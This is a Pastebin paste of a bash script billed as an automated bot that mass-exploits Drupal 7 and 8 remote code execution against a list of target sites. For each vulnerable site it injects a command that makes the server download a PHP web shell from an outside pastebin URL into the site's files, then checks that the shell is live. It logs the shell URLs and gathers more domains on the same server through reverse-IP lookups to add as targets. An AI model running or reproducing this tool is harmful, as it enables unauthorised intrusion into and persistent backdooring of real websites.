Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # AutoExploit [BOT]
- # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
- # Date : 22 - Apr - 2018
- # Usage : ./rce.sh list.txt
- # Coded by ZeroByte.ID
- useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
- reverse() {
- target=$1
- getip=$(dig +short $1);
- check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
- if [[ $check =~ 'No records found' ]]; then
- echo "[BAD] $getip";
- return 1
- elif [[ $check =~ 'error check' ]]; then
- echo "[BAD] $getip";
- return 1
- elif [[ $check =~ 'API count exceeded' ]]; then
- echo "[WAITING]"
- echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
- echo "[JANGAN DI STOP!]";
- echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
- sleep 10m;
- exit
- else
- curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
- sleep 0.5s
- list=$(cat domain.tmp | wc -l);
- cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
- sort domains2.tmp | uniq >> domains.tmp
- echo "[OK] $getip and $list site";
- sleep 0.6s
- rm domain.tmp
- rm domains2.tmp
- fi
- }
- drupal7() {
- target=$1
- echo -ne "---";
- cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
- echo -ne "-------";
- sleep 2s
- if [[ $cek7 =~ 'value="form-' ]]; then
- echo -ne "--------------------------";
- token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- echo -ne "----------------------------------";
- echo
- sleep 2s
- result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
- if [[ $result =~ 'Linux' ]]; then
- echo "[O] VULN RCE $target : uname -a"
- echo "$result";
- echo "Proses Upload Shell ....."
- sleep 2s
- uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
- sleep 5s
- cekshellhome=$(curl -s -m 10 "${target}/zb.php");
- if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
- echo "[HOME] Upload Done"
- echo "$result" >> result.txt
- echo "$target/zb.php" | tee -a result.txt
- else
- echo "[HOME] Can't Upload"
- fi
- sleep 2s
- uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
- sleep 5s
- cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
- if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
- echo "[DIR WRITABLE] Upload Done"
- echo "$result" >> result.txt
- echo "$target/sites/default/files/zb.php" | tee -a result.txt
- echo "=====================================" >> result.txt
- reverse $target
- else
- echo "[DIR WRITABLE] Can't Upload"
- echo "$target" >> gagal-upload.txt
- fi
- echo "--------------------------------------------------------------------------"
- else
- echo "[X] NOT VULN $target"
- drupal8 $target
- fi
- else
- echo
- echo "[X] NOT VULN $target";
- drupal8 $target
- fi
- }
- drupal8() {
- target=$1
- echo "[O] CHECKING DRUPAL 8";
- echo -ne "---";
- cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
- cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
- echo -ne "-------------------";
- if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
- echo -ne "-------------------------------------------";
- echo "[O] Upload Done"
- echo "$target/zb.php" | tee -a result.txt
- reverse $target
- else
- if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
- echo -ne "-------------------------------------------";
- echo "[O] Upload Done"
- echo "$target/sites/default/files/zb.php" | tee -a result.txt
- fi
- echo
- echo "[X] NOT VULN $target !"
- echo -ne "-------------------------------------------------";
- echo "$target" >> not-vuln.txt
- echo
- fi
- }
- cat << "banner"
- --------------------------------------------------
- _ _ _ _
- _______ _ __ ___ | |__ _ _| |_ ___ (_) __| |
- |_ / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
- / / __/ | | (_) | |_) | |_| | || __/_| | (_| |
- /___\___|_| \___/|_.__/ \__, |\__\___(_)_|\__,_|
- |___/
- kUr4x
- ----------------[ RCE Drupal ]--------------------
- banner
- for s in $(cat $1); do
- echo "CHECKING DRUPAL 7 $s"
- echo -ne "----";
- drupal7 $s
- done
- rm cookie.tmp
Advertisement
Advertisement
Advertisement
RAW Paste Data
Copied
Advertisement